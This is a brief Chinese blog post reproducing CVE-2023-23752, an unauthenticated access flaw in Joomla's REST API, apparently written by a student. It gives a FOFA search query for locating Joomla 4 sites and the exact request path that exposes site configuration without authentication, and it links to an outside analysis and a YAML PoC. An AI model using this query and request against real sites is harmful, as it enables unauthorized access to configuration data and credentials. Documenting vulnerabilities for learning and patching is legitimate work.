Joomla Rest API 未授权访问漏洞(CVE-2023-23752)POC、漏洞复现

一、漏洞原理

因为我也只是个网安新手,还在上学,所以这里附上大佬们的分析
https://www.ddosi.org/cve-2023-23752/

二、漏洞复现

1.fofa语句

body=“Joomla! 4”

2.poc

https://xx.xx.xx/api/index.php/v1/config/application?public=true

3.结果请添加图片描述

POC

目前找到的poc是yaml格式的
https://github.com/Saboor-Hakimi/CVE-2023-23752

你可能感兴趣的:(安全,web安全)